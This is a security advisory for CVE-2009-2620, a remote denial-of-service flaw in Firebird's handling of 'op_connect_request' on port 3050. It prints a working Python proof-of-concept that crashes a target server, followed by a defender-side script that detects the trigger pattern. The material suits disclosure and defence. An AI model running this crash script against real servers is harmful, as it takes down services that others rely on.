Bugtraq ID: 35842
CVE ID: CVE-2009-2620
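Firebird is a popular database program.
Firebird does not correctly handle 'op_connect_request' messages that contain invalid data. A remote attacker can exploit this vulnerability to carry out a denial-of-service attack against the service.
Sending an 'op_connect_request' message with invalid data of 12 bytes or more to the default port 3050 triggers the vulnerability, crashing the service and causing a denial of service.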
Firebird Firebird 2.1.3 RC1
Firebird Firebird 2.1.2
Firebird Firebird 2.1.1
Firebird Firebird 2.0.5
Firebird Firebird 2.0.1
Firebird Firebird 1.5.5
Firebird Firebird 2.5 Beta 1
Vendor solution
Users can refer to the Firebird CVS repository to obtain the updated program:
http://www.firebirdsql.org/
# Python 2 script (print statements, str sent directly on the socket)
import socket
import time

def attack(host, port):
    op_connect_request = '\x35'  # Request to establish connection
    packet = '\x00\x00\x00' + op_connect_request
    packet += "A" * 12  # Invalid data, must be >= 12 bytes in order to trigger the DoS
    print "(+) Connecting to the server...."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print "(+) Sending op_connect_request packet..."
    s.send(str(packet))
    s.close()
    print "(+) op_connect_request packet successfully sent."
    # Wait 10 seconds and try to connect again to Firebird SQL server, to check if it's down
    print "(+) Waiting 10 seconds before trying to reconnect to the server..."
    time.sleep(10)
    try:
        print "(+) Trying to reconnect..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.close()
        print "(!) Something went wrong. The server is still alive."
    except socket.error:
        print "(*) Attack successful. The server is down."

port = 3050
host = '192.168.131.128'  # Replace with your target host
attack(host, port)
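
A defender-side triage check for the trigger condition described in this advisory, as an added example that is not part of the original advisory or of Firebird: it flags a connection's first payload to port 3050 when it opens with the 4-byte opcode 0x35 followed by 12 or more bytes. The record layout, function names and sample payloads are constructed for illustration, and the check looks only at opcode and length, so a match is a signal to review rather than proof of an attempt.

```python
import struct

FIREBIRD_PORT = 3050        # default port named in the advisory
OP_CONNECT_REQUEST = 0x35   # opcode value used in the advisory's test script
MIN_TRIGGER_BODY = 12       # advisory: invalid data of >= 12 bytes triggers the crash


def classify_first_payload(payload: bytes) -> str:
    """Classify the first client payload of a TCP connection (hypothetical helper)."""
    if len(payload) < 4:
        return "too-short"                        # no complete 4-byte opcode
    (opcode,) = struct.unpack(">I", payload[:4])  # opcode as a big-endian 32-bit value
    if opcode != OP_CONNECT_REQUEST:
        return "other-op"
    if len(payload) - 4 >= MIN_TRIGGER_BODY:
        return "suspect"                          # meets the advisory's size condition
    return "short-connect-request"


def scan(records):
    """Return (src, verdict) for payloads sent to the Firebird port that
    open with op_connect_request. Payload content is not validated."""
    hits = []
    for src, dst_port, hex_payload in records:
        if dst_port != FIREBIRD_PORT:
            continue
        verdict = classify_first_payload(bytes.fromhex(hex_payload))
        if verdict in ("suspect", "short-connect-request"):
            hits.append((src, verdict))
    return hits


# Constructed sample records: (source IP, destination port, first payload as hex).
SAMPLE = [
    ("10.0.0.5", 3050, "00000001" + "00" * 16),  # a different opcode
    ("10.0.0.9", 3050, "00000035" + "41" * 12),  # opcode 0x35 + 12 bytes
    ("10.0.0.9", 3050, "00000035" + "41" * 4),   # opcode 0x35, short body
    ("10.0.0.7", 8080, "00000035" + "41" * 12),  # other port, ignored
    ("10.0.0.8", 3050, "0000"),                  # truncated payload
]

if __name__ == "__main__":
    for src, verdict in scan(SAMPLE):
        print(src, verdict)
```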